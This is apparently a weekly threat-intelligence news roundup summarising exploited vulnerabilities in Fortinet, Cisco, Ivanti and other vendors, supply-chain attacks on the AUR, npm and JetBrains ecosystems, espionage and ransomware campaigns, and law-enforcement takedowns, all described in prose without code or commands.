Threat actors are actively exploiting multiple high-severity vulnerabilities affecting Fortinet, Cisco, LiteSpeed, Ivanti, Palo Alto Network, and Oracle products. Fortinet FortiSandbox flaws CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089 are being targeted and could allow privilege escalation and remote code execution.
Fortinet also warned that CVE-2025-61624 has been exploited in the wild. In should be noted that security researchers reported a data leak, referred to as ‘FortiBleed,’ that has exposed VPN login credentials for nearly 74,000 Fortinet/FortiGate firewall systems worldwide. Security researcher Bob Diachenko found a database containing usernames, email addresses, and plaintext passwords that appeared to be valid. The leaked data reportedly includes credentials linked to major organizations such as Chevron, Samsung, Foxconn, Comcast, AT&T, Mercedes-Benz, and Toyota. Fortinet has yet to comment on the reported breach allegations
Cisco patched the actively exploited zero-day CVE-2026-20262 in Catalyst SD-WAN Manager, which allows low-privilege attackers to gain root-level command execution. In addition, CISA reported active exploitation of CVE-2026-54420 in the LiteSpeed cPanel Plugin, which can enable attackers with FTP or web shell access to escalate privileges to root on affected shared hosting servers. The cybersecurity agency has also flagged as exploited a missing auth issue (CVE-2026-20253) in Splunk Enterprise, and an improper access control vulnerability (CVE-2026-48907) affecting Widget Factory Joomla Content Editor.
Furthermore, an OS command injection vulnerability (CVE-2026-10520) in Ivanti Sentry, CVE-2026-35273 in Oracle’s PeopleSoft PeopleTools, and CVE-2026-0257 in Palo Alto Networks’s GlobalProtect are also being abused in the wild.
F5 has released out-of-band security updates for NGINX to fix multiple security issues, including CVE-2026-42530 and CVE-2026-42055. The flaws affect specific NGINX modules and could allow unauthenticated remote attackers to cause denial-of-service (DoS) attacks or potentially execute arbitrary code on vulnerable systems using non-default configurations. Organizations using affected NGINX deployments should apply the latest security updates as soon as possible.
ESET researchers have discovered two previously undocumented Windows variants of the SprySOCKS backdoor, a malware family that was previously observed targeting only Linux systems. The malware is linked to FishMonger, a cyber espionage group believed to be operated by Chinese contractor I-SOON.
ESET has also observed DeadLock ransomware expanding its use of Polygon blockchain smart contracts. Previously, the group used smart contracts only to rotate chat proxy server addresses. DeadLock has now introduced a new contract containing its Data Leak Site (DLS) entries. This appears to be the first known use of blockchain-hosted DLS content by a ransomware group.
A long-running cyber-espionage campaign, dubbed ‘Operation Highland,’ has been linked to the Chinese threat group, tracked as Velvet Ant. The attackers reportedly maintained access to a large organization's network for nearly 10 years. After gaining an initial foothold, the attackers deployed a modified GS-Netcat reverse shell disguised as a legitimate system component. The malware provided encrypted remote access and achieved persistence through malicious systemd services or startup script modifications.
In a separate China-linked operation, a cyber espionage group, tracked as UNC6508, targeted vulnerable REDCap servers at a North American medical research institution, deploying custom malware and stealing sensitive data over a period of more than a year. GTIG believes the attackers first compromised the organization in September 2023 after probing outdated REDCap installations. The intrusion remained undetected until November 2025.
Poland has warned that a Belarus-linked hacking group is expanding its cyberattacks to target personal Gmail accounts belonging to senior public figures and their family members. Poland’s national cybersecurity agency CERT Polska says that the group known as GhostWriter has increasingly focused on Gmail users since March of this year. Previously, the hackers mainly targeted work accounts and email services provided by Polish companies.
A large-scale malware campaign has been targeting Arch Linux users through the Arch User Repository (AUR). More than 400 packages were reportedly modified to distribute a credential-stealing malware and Linux rootkit. A threat actor impersonated a trusted AUR maintainer and gained control of numerous packages. The attacker added malicious installation scripts that downloaded and executed a rogue npm package called ‘atomic-lockfile’ during software installation.
In yet another large-scale supply-chain attack, more than 140 npm packages linked to the Mastra ("@mastra/*") open-source AI development framework were compromised. Attackers hijacked a legitimate npm account belonging to a former Mastra contributor and published 144 malicious package versions within 88 minutes. The compromised packages contained a dependency called ‘easy-day-js,’ a fake version of the popular date library Day.js. The package downloaded and executed malware during installation.
Security researchers discovered a malware campaign involving at least 15 malicious plugins on the JetBrains Marketplace. The plugins were designed to steal AI API keys from developers and have been downloaded nearly 70,000 times. The plugins, published under seven different vendor accounts, were masked as AI coding assistants, code-review tools, and Git utilities.
Microsoft discovered a Windows-based cryptocurrency clipper active since February 2026. The malware uses Windows Script Host and ActiveX to start a built-in Tor proxy and communicate with a hidden command-and-control server. It steals clipboard data, captures screenshots, and replaces copied cryptocurrency wallet addresses with attacker-controlled ones to redirect funds.
The DragonForce ransomware group has expanded its malware toolkit with a new tool that hides command-and-control (C&C) communications inside Microsoft Teams infrastructure. The malware, named Backdoor.Turn, is believed to be the first known malware observed in real-world attacks abusing Microsoft Teams TURN relay servers for stealthy communications.
Check Point Research discovered a malware campaign that uses fake cryptocurrency tools to trick users into downloading malicious software. The campaign targets crypto traders and online gamblers by promoting fake Solana and Pump.fun bots, as well as gambling prediction tools, through phishing sites, GitHub, SourceForge, YouTube, and even news articles. The malware, a Rust-based clipboard hijacker for Windows and macOS, replaces copied cryptocurrency wallet addresses with attacker-controlled ones, allowing criminals to steal digital assets.
International law enforcement agencies disrupted the SocGholish malware network by cleaning nearly 15,000 infected WordPress websites and shutting down 106 related servers and domains. The operation, called Operation Endgame, targeted infrastructure linked to the Russian cybercrime group known as Evil Corp. SocGholish malware tricks users into downloading fake browser updates from compromised websites, helping criminals spread malware and ransomware.
Oleksii Oleksiyovych Lytvynenko, a Ukrainian national, has pleaded guilty to conspiracy charges linked to the notorious Conti ransomware operation. Prosecutors said Lytvynenko participated in attacks that infiltrated victim networks, stole sensitive data, and encrypted systems to extort Bitcoin ransom payments. Lytvynenko also admitted to helping develop a loader used to deploy malware while working with a team operated by another Conti member.
Law enforcement agencies have taken down the cryptocurrency laundering service known as AudiA6, which authorities say was used by ransomware groups and other cybercriminals to launder more than $380 million in illicit funds. AudiA6 operated between 2022 and 2025 as a cryptocurrency mixing service that helped criminals hide the origin of stolen funds. The platform allegedly moved money through complex transaction chains before returning it to users for a commission fee.
The FBI and partners dismantled Outsider Enterprise, a Chinese phishing-as-a-service network that used AI-powered phishing kits and fake websites to steal credit card data and passwords. The operation was linked to over 3.8 million stolen credit card records and $1.9 billion in losses. Authorities seized servers, cryptocurrency, and related infrastructure, while Google filed a lawsuit against the group.
US authorities shut down 13 websites connected to a Chinese espionage campaign targeting current and former US government employees with security clearances. The sites posed as consulting firms offering fake jobs to gain access to sensitive information. Operators allegedly used fake identities, stolen data, AI-generated photos, encrypted messaging apps, and cryptocurrency.
The US Department of Justice seized CFAKE[.]com and SOCFAKE[.]com, websites accused of distributing nonconsensual AI-generated nude images and videos. The platforms allegedly hosted deepfake content featuring politicians, celebrities, athletes, musicians, and royalty. This is believed to be the first public domain seizure under the TAKE IT DOWN Act, which targets nonconsensual intimate imagery and AI-generated deepfakes.
Chinese authorities arrested 67 people linked to Silver Fox, the country’s largest cybercrime group. Operating since mid-2024, the group targeted Chinese-speaking users in China and abroad with malware that could steal passwords, intercept SMS codes, and collect sensitive data.
The arrests took place across five provinces and included malware developers, phishing website operators, and fraudsters. Authorities say Silver Fox mainly targeted employees in businesses and public institutions, especially finance staff.